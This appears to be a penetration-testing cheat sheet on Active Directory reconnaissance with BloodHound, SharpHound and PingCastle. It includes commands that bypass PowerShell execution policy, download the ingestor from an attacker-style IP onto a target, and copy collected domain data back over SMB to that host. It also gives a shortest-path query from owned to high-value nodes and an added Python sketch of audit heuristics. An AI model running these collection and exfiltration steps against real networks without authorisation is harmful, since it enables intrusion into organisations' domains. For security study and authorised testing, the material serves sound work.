Domain Mapping
BloodHound
# /!\ Information here might be outdated
# Future update incoming
Tips
# Right Click
# Get information about the node and also how to compromise the user / machine
# Owned
# Can be useful during an internal pentest to note where you are
# Nodes will be tagged with a skull
# It's then possible to ask the shortest path to a node from the owned ones
# Filters
# Can be useful
# Shortcuts
# CTRL --> Change node display
# CTRL+SHIFT+I --> Developer Tools
# CTRL+R --> Reload display
# Still possible to edit data to set what you want
# If you don't have access to a domain machine but do have creds,
# you can run the collector from your own host with a network-only logon
runas /netonly /user:FQDN.local\USER powershell
# Then
Import-Module Sharphound.ps1
Invoke-BloodHound -ZipFileName 'PATH/TO/ZIP.zip' -JsonFolder 'PATH/TO/FOLDER' -CollectionMethod All -Domain FQDN
Setup
# BloodHound directly from the target machine
# apt-get install bloodhound
# Setup
$ sudo neo4j console
...
... http://localhost:7474
user/pass = neo4j/neo4j
# Start
$ bloodhound
URL : bolt://127.0.0.1:7687
Target Collection
# On the target, drop the Sharphound ingestor
# You can drop it through shared folder or by download
https://github.com/BloodHoundAD/BloodHound
https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
# Powershell
Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-Bloodhound
Invoke-BloodHound -CollectionMethod All
# Default : Domains, Computers, Users, Groups
# All : Domains, Computers, Users, Groups, OUs, GPOs
# Exe
# You may need some .NET packages
C:\> SharpHound.exe
C:\> SharpHound.exe --CollectionMethod SessionLoop --MaxLoopTime 1h
C:\> SharpHound.exe --CollectionMethod ACL
.\SharpHound.exe --domain UCA.LAN --domaincontroller 192.168.30.10 --ldapusername "die-hardman" --ldappassword "maskonyourface" --CollectionMethod Group,LocalGroup,GPOLocalGroup,Session,LoggedOn,ObjectProps,ACL,ComputerOnly,Trusts,Default,RDP,DCOM,DCOnly
# Python based ingestor (for remote work)
https://github.com/fox-it/BloodHound.py
# Collection Methods : Default, Group, LocalAdmin, RDP, DCOM, Session, Acl, Trusts, LoggedOn, ObjectProps, All (except LoggedOn)
bloodhound-python -u USERNAME -p PASSWORD -d DOMAIN --collectionmethod All,LoggedOn
# Drop BloodHound ingestor and get results back through SMB Server
python -m SimpleHTTPServer
Invoke-WebRequest -Uri "http://10.10.16.112:8000/SharpHound.ps1" -OutFile ".\SharpHound.ps1"
Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-Bloodhound
Invoke-BloodHound -CollectionMethod All
# Since Windows 10 you can't do anonymous smbserver anymore
sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon"
net use Z: \\192.168.30.130\SDFR /user:peon peon
net use Z: /delete /y
copy C:\Users\xxx\Documents\20191104044628_BloodHound.zip \\10.10.16.112\TESTLOL\file.zip
Analysis
# Results will be zipped
# Get back zip, unzip it and upload files into bloodhound
# Custom queries
https://github.com/hausec/Bloodhound-Custom-Queries
# Replace or update the following file
C:\Users\[USERNAME]\AppData\Roaming\BloodHound\customqueries.json
# Automated, extensible toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets.
https://github.com/seajaysec/cypheroth/
./cypheroth.sh -u neo4j -p BloodHound -d TESTLAB.LOCAL
./cypheroth.sh -u neo4j -p hunter2 -d BigTech.corp -a 10.0.0.1:7687 -t 5m -v true
# Some quickwin queries against a BloodHound database
https://github.com/kaluche/bloodhound-quickwin
# BloodHound tips for when the built-in queries are just not finding anything for you
https://twitter.com/n00py1/status/1508868743451090944?t=QfZV1rg7sjy6EG_pRAfiFg&s=19
# - Mark any user you compromise as "owned".
# - Mark high value targets
# - Find groups that have the "Admin Count" flag set but are not yet marked as high value
# - Find groups that do not have the "Admin Count" flag set, but have local admin on computers
# - Find all computers that can perform unconstrained delegation but are not DCs
# - Find any object that has inbound control over the domain. Mark them all as high value. Mark the domain as high value also.
# - Find groups that can reset passwords. Mark these groups as high value.
# - Then run the shortest path from any owned node to any high value node:
MATCH p=shortestPath((g {owned:true})-[*1..]->(n {highvalue:true})) WHERE g<>n RETURN p
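Added example (not from the page or the BloodHound project): the audit heuristics in the list above and the final shortestPath query, implemented as plain-Python checks over a small constructed in-memory graph so the logic can be reasoned about offline without Neo4j. All node names, properties and edges are constructed; property and edge names follow BloodHound's schema, and "is a DC" is approximated by membership in the Domain Controllers group.

```python
from collections import deque

# Constructed sample graph (not real data): name -> (label, properties); BloodHound schema names.
NODES = {
    "ALICE@CORP.LOCAL": ("User", {"owned": True}),
    "HELPDESK@CORP.LOCAL": ("Group", {"adminCount": False}),
    "BACKUP OPS@CORP.LOCAL": ("Group", {"adminCount": True, "highvalue": False}),
    "DOMAIN ADMINS@CORP.LOCAL": ("Group", {"adminCount": True, "highvalue": True}),
    "DOMAIN CONTROLLERS@CORP.LOCAL": ("Group", {"adminCount": True, "highvalue": True}),
    "DC01.CORP.LOCAL": ("Computer", {"unconstraineddelegation": True, "highvalue": True}),
    "FS01.CORP.LOCAL": ("Computer", {"unconstraineddelegation": True}),
}
# Directed edges (source, relationship, target) using BloodHound edge names.
EDGES = [
    ("ALICE@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "FS01.CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "GenericAll", "BACKUP OPS@CORP.LOCAL"),
    ("BACKUP OPS@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("DC01.CORP.LOCAL", "MemberOf", "DOMAIN CONTROLLERS@CORP.LOCAL"),
]

def admincount_groups_not_highvalue():
    """Groups with AdminCount set that nobody has marked high value yet."""
    return sorted(n for n, (lbl, p) in NODES.items()
                  if lbl == "Group" and p.get("adminCount") and not p.get("highvalue"))

def non_admincount_groups_with_local_admin():
    """Groups without AdminCount that still hold local admin on a computer."""
    return sorted({s for s, rel, _ in EDGES if rel == "AdminTo"
                   and NODES[s][0] == "Group" and not NODES[s][1].get("adminCount")})

def unconstrained_delegation_non_dc():
    """Computers with unconstrained delegation that are not domain controllers."""
    dcs = {s for s, rel, d in EDGES if rel == "MemberOf" and d.startswith("DOMAIN CONTROLLERS@")}
    return sorted(n for n, (lbl, p) in NODES.items() if lbl == "Computer"
                  and p.get("unconstraineddelegation") and n not in dcs)

def shortest_owned_to_highvalue():
    """BFS form of the shortestPath query: nearest high-value node at least one hop from any owned node."""
    owned = [n for n, (_, p) in NODES.items() if p.get("owned")]
    visited, parent, queue = set(owned), {}, deque(owned)
    while queue:
        cur = queue.popleft()
        for nxt in (d for s, _, d in EDGES if s == cur):
            if NODES[nxt][1].get("highvalue"):  # target reached: walk parents back to an owned node
                path = [nxt, cur]
                while path[-1] in parent:
                    path.append(parent[path[-1]])
                return path[::-1]
            if nxt not in visited:
                visited.add(nxt); parent[nxt] = cur; queue.append(nxt)
    return None
```

Each function returns the names a defender would review (or mark high value) for that heuristic; the BFS returns the attack path as a list of node names, matching what the Cypher query draws.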
PingCastle
Link: https://www.pingcastle.com/PingCastleFiles/PingCastle_2.4.3.0.zip
> Drop the exe on the target
> Run PingCastle.exe (interactive mode by default)
> Healthcheck (enter) and domain (*)
> CLI mode:
> PingCastle --healthcheck --server mydomain.com
> PingCastle --carto
ADACLScanner
TODO